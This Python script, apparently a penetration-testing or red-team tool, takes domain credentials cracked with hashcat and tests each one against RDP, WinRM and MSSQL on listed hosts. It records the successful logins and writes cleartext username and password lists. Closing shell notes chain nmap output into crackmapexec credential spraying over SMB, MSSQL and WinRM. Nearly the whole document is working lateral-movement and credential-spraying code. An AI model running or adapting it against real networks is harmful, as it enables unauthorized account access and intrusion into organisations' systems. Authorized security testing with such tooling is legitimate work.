Check access over common ports and services
import sys
from impacket_rdpcheck import check_rdp as imp_checkrdp
import impacket_rdpcheck_original as imp_checkrdp_orig
from argparse import ArgumentParser
from pypsrp.client import Client
from impacket import tds
from sys import stdout
from os import path
from cme import crackmapexec
import socket
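def parse_hashcat_creds(creds_fd):
    """Parse a hashcat output file into a ``{(domain, username): password}`` map.

    Every line is split on ``:``; field 0 is taken as the username, field 2
    as the domain and the *last* field as the cracked password.  That layout
    matches a ``user::DOMAIN:...:password`` line, but the hash mode is not
    visible in this file — TODO confirm against the actual input.  Because
    only the last field is kept, a password that itself contains ``:`` is
    truncated to its final segment (unchanged from the original behaviour).

    Args:
        creds_fd: path of the hashcat output file.

    Returns:
        dict keyed by ``(domain, username)`` with the plaintext password as
        value; a later line for the same key overwrites an earlier one.
        Blank lines and lines with fewer than three fields are skipped
        (the original raised IndexError on them, e.g. on a trailing empty line).
    """
    creds = {}
    with open(creds_fd, 'r') as creds_file:
        for raw in creds_file:
            line = raw.rstrip('\r\n')
            if not line.strip():
                continue  # empty / whitespace-only line: nothing to parse
            fields = line.split(':')
            if len(fields) < 3:
                continue  # malformed line: no domain field to read
            username = fields[0]
            domain = fields[2].strip()
            password = fields[-1].strip()
            creds[(domain, username)] = password
    return creds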
def parse_computers(computers_fd):
    """Read a host list: the text before the first ``:`` on each line is one host.

    Args:
        computers_fd: path of a file with one ``host[:port...]`` entry per line.

    Returns:
        list of host strings in file order; a blank line contributes an empty
        string, exactly as the original did.
    """
    with open(computers_fd, 'r') as computers_file:
        hosts = []
        for entry in computers_file:
            host, _sep, _rest = entry.partition(':')
            hosts.append(host.strip())
    return hosts
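def checkRdp(creds_dict, computers, output_dir=None):
    """Try every ``(domain, username)`` credential against each host over RDP.

    Successful pairs are written one per line as ``DOMAIN\\user@host`` to
    ``rdp_success.txt`` inside ``output_dir`` (``None`` falls back to the
    module-level ``options.output`` set in the ``__main__`` block).  The probe
    is delegated to ``impacket_rdpcheck_original.main()``, which reads its
    target from ``sys.argv``, so ``sys.argv`` is overwritten for every attempt;
    the ``imp_checkrdp`` import is not used by this function.

    Args:
        creds_dict: ``{(domain, username): password}`` from ``parse_hashcat_creds``.
        computers: iterable of host strings.
        output_dir: directory for the results file; ``None`` uses ``options.output``.
    """
    max_timeouts = 100000  # per-host budget; the counter restarts for each host
    out_dir = options.output if output_dir is None else output_dir
    with open(path.join(out_dir, 'rdp_success.txt'), 'w+') as results:
        for computer in computers:
            timeouts = 0
            for domain, username in creds_dict.keys():
                print('[RDP] CHECK %s\\%s for %s' % (domain, username, computer))
                if timeouts > max_timeouts:
                    continue  # budget exhausted for this host; skip silently as before
                try:
                    sys.argv = ['impacket_rdpcheck_original', '\'%s/%s:%s@%s\'' % (domain,username,creds_dict[domain,username],computer)]
                    if imp_checkrdp_orig.main():
                        print('[RDP] SUCCESS %s\\%s for %s' % (domain, username, computer))
                        # '\n' added: the original ran every hit together on one line
                        results.write('%s\\%s@%s\n' % (domain, username, computer))
                except TimeoutError:
                    timeouts += 1
                    print('[RDP] FAIL TIMEOUT %s\\%s@%s' % (domain, username, computer))
                except Exception as e:
                    print('[RDP] FAIL %s\\%s@%s %s' % (domain, username, computer, e))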
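def checkWinrm(creds_dict, computers, output_dir=None):
    """Try every credential against each host over WinRM and record the hits.

    Successful ``DOMAIN\\user@host`` pairs are written one per line to
    ``winrm_success.txt`` inside ``output_dir`` (``None`` falls back to the
    module-level ``options.output`` set in the ``__main__`` block).  The probe
    is ``winrm_plaintext_login``, which already catches and prints every
    exception itself, so the ``TimeoutError`` handler here is only a guard.

    Args:
        creds_dict: ``{(domain, username): password}`` from ``parse_hashcat_creds``.
        computers: iterable of host strings.
        output_dir: directory for the results file; ``None`` uses ``options.output``.
    """
    out_dir = options.output if output_dir is None else output_dir
    with open(path.join(out_dir, 'winrm_success.txt'), 'w+') as results:
        for computer in computers:
            for domain, username in creds_dict.keys():
                print('[WINRM] CHECK %s\\%s for %s' % (domain, username, computer))
                try:
                    if winrm_plaintext_login(computer, domain, username, creds_dict[domain, username]):
                        print('[WINRM] SUCCESS %s\\%s for %s' % (domain, username, computer))
                        # '\n' added: the original ran every hit together on one line
                        results.write('%s\\%s@%s\n' % (domain, username, computer))
                except TimeoutError as err:
                    # previously counted into an unused local and dropped silently
                    print('[WINRM] FAIL TIMEOUT %s\\%s@%s %s' % (domain, username, computer, err))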
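def checkMssql(creds_dict, computers, output_dir=None):
    """Try every credential against each host's SQL Server and record the hits.

    Successful ``DOMAIN\\user@host`` pairs are written one per line to
    ``mssql_success.txt`` inside ``output_dir`` (``None`` falls back to the
    module-level ``options.output`` set in the ``__main__`` block).  The probe
    is ``mssql_plaintext_login``, which already catches and prints every
    exception itself, so the ``TimeoutError`` handler here is only a guard.

    Args:
        creds_dict: ``{(domain, username): password}`` from ``parse_hashcat_creds``.
        computers: iterable of host strings.
        output_dir: directory for the results file; ``None`` uses ``options.output``.
    """
    out_dir = options.output if output_dir is None else output_dir
    with open(path.join(out_dir, 'mssql_success.txt'), 'w+') as results:
        for computer in computers:
            for domain, username in creds_dict.keys():
                print('[MSSQL] CHECK %s\\%s for %s' % (domain, username, computer))
                try:
                    if mssql_plaintext_login(computer, domain, username, creds_dict[domain, username]):
                        print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, computer))
                        # '\n' added: the original ran every hit together on one line
                        results.write('%s\\%s@%s\n' % (domain, username, computer))
                except TimeoutError as err:
                    # previously counted into an unused local and dropped silently
                    print('[MSSQL] FAIL TIMEOUT %s\\%s@%s %s' % (domain, username, computer, err))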
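def mssql_plaintext_login(host, domain, username, password, port=1433):
    """Attempt one SQL Server login with a plaintext credential via impacket TDS.

    On a failed login the server replies are echoed with ``printReplies()``.
    The connection is now closed in ``finally``; the original never
    disconnected, leaking a socket per attempt.

    Args:
        host: SQL Server host.
        domain: domain passed to ``login``; also used in the log lines.
        username, password: credential under test.
        port: TCP port, default 1433 (previously hard-coded).

    Returns:
        True when ``login`` returns True, otherwise False.  Errors are printed,
        never raised.
    """
    conn = None
    try:
        conn = tds.MSSQL(host, port, rowsPrinter=stdout)
        conn.connect()
        # positional args assumed to be (database, username, password, domain,
        # hashes, useWindowsAuth) per impacket's tds.MSSQL.login — TODO confirm
        res = conn.login(None, username, password, domain, None, False)
        if res is not True:
            conn.printReplies()
            print('[MSSQL] FAIL %s\\%s@%s' % (domain, username, host))
            return False
        print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, host))
        return True
    except Exception as e:
        print('[MSSQL] FAIL %s\\%s@%s %s' % (domain, username, host, e))
        return False
    finally:
        if conn is not None:
            try:
                conn.disconnect()
            except Exception:
                pass  # best-effort socket cleanup; the result above already stands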
def winrm_plaintext_login(host, domain, username, password):
    """Probe WinRM on ``host`` by running ``hostname`` over an NTLM session.

    ``domain`` only appears in the failure message; the client is given the
    bare ``username``.  TLS is disabled (``ssl=False``).

    Returns:
        True if ``execute_ps`` completes, False on any exception (which is
        printed, never raised).
    """
    client_kwargs = dict(auth='ntlm', username=username, password=password, ssl=False)
    try:
        session = Client(host, **client_kwargs)
        session.execute_ps("hostname")
    except Exception as err:
        print('[WINRM] FAIL %s\\%s@%s %s' % (domain, username, host, err))
        return False
    return True
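def createUserlist(creds_dict, output_dir=None):
    """Write one ``DOMAIN\\user`` line per credential to ``userlist.txt``.

    Lines follow the dict's insertion order — the same order
    ``createPasswordlist`` uses for ``passlist.txt`` — so line *i* of both
    files describes the same credential (the shell usage notes at the bottom
    of this file feed both to ``crackmapexec --no-bruteforce``, which relies
    on that line-by-line pairing).

    Args:
        creds_dict: ``{(domain, username): password}``.
        output_dir: target directory; ``None`` falls back to the module-level
            ``options.output`` set in the ``__main__`` block.
    """
    out_dir = options.output if output_dir is None else output_dir
    with open(path.join(out_dir, 'userlist.txt'), 'w') as userlist:
        userlist.writelines('%s\\%s\n' % (domain, username) for domain, username in creds_dict)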
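def createPasswordlist(creds_dict, output_dir=None):
    """Write one plaintext password per line to ``passlist.txt``.

    Lines follow the dict's insertion order, matching ``createUserlist`` so
    the two files line up positionally.  The file holds cleartext passwords;
    the output directory should be access-restricted and cleaned up after use.

    Args:
        creds_dict: ``{(domain, username): password}``.
        output_dir: target directory; ``None`` falls back to the module-level
            ``options.output`` set in the ``__main__`` block.
    """
    out_dir = options.output if output_dir is None else output_dir
    with open(path.join(out_dir, 'passlist.txt'), 'w') as passlist:
        passlist.writelines('%s\n' % password for password in creds_dict.values())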
# def checkRdpMock(creds_dict):
# check_rdp()
if __name__ == '__main__':
    # NOTE: `options` is a module-level name; checkRdp/checkWinrm/checkMssql,
    # createUserlist and createPasswordlist read `options.output` from here.
    parser = ArgumentParser(
        description='Check access on commonly accessed services with domain creds')
    parser.add_argument('--hashcat-file', '-f', type=str, required=True,
                        help='Hashcat output file', dest='hashcat_file')
    # parser.add_argument('--domain', '-d', type=str, required=True,
    # help = 'domain to check for access', dest = 'domain')
    # NOTE(review): the help text below was carried over from the removed
    # --domain flag; the value is the host-list file read by parse_computers.
    parser.add_argument('--computer-list', '-c', type=str, required=True,
                        help='domain to check for access', dest='computers')
    # NOTE(review): despite the flag name this is a *directory*: every writer
    # joins its own filename onto it (rdp_success.txt, userlist.txt, ...).
    parser.add_argument('--output-file', '-o', type=str, required=True,
                        help='Output file for successful connections', dest='output')
    # --rdp is accepted but its handler (checkRdp) is commented out below.
    parser.add_argument("--rdp", "-r", action='store_true', help='authenticate RDP with input file', dest='rdp')
    parser.add_argument("--winrm", "-w", action='store_true', help='authenticate winrm with input file', dest='winrm')
    parser.add_argument("--mssql", "-m", action='store_true', help='authenticate mssql with input file', dest='mssql')
    parser.add_argument("--create-userlist", "-u", action='store_true',
                        help='create domain qualified userlist & password list for crackmap', dest='userlist')
    options = parser.parse_args()
    creds_dict = parse_hashcat_creds(options.hashcat_file)
    computers = parse_computers(options.computers)
    if options.userlist:
        # both writers iterate creds_dict in the same order, so the two files line up
        createUserlist(creds_dict)
        createPasswordlist(creds_dict)
    # if options.rdp:
    # checkRdp(creds_dict, computers)
    if options.winrm:
        checkWinrm(creds_dict, computers)
    if options.mssql:
        checkMssql(creds_dict, computers)
    #todo crackmap spray
    # NOTE(review): '<ip>' is a literal placeholder and this call is not behind
    # any flag, so it runs on every invocation after the checks above; the
    # shell usage notes in the string below invoke crackmapexec directly instead.
    sys.argv = ['crackmapexec','smb', '<ip>']
    crackmapexec.main()
# Usage notes kept as a bare string expression (no runtime effect).
'''
./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 139,445 | ./nmap-parse-output - hosts | cut -d ':' -f1 | sort -u > ~/outputs/smb.txt && \
./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-sql-s | cut -d ':' -f1 | sort -u > ~/outputs/mssql.txt &&\
./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 5985,5986 | ./nmap-parse-output - hosts | cut -d ':' -f1 | sort -u > ~/outputs/winrm.txt &&\
./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-wbt-server | cut -d ':' -f1 | sort -u > ~/outputs/rdp.txt &&\
./<this_file> -f ~/outputs/hashcat_output.txt -c ~/outputs/rdp.txt -o C:\\Users\\root\PycharmProjects\crackd_check\ -u -r &&\
crackmapexec smb ~/outputs/smb.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
crackmapexec mssql ~/outputs/mssql.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
crackmapexec winrm ~/outputs/winrm.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce
'''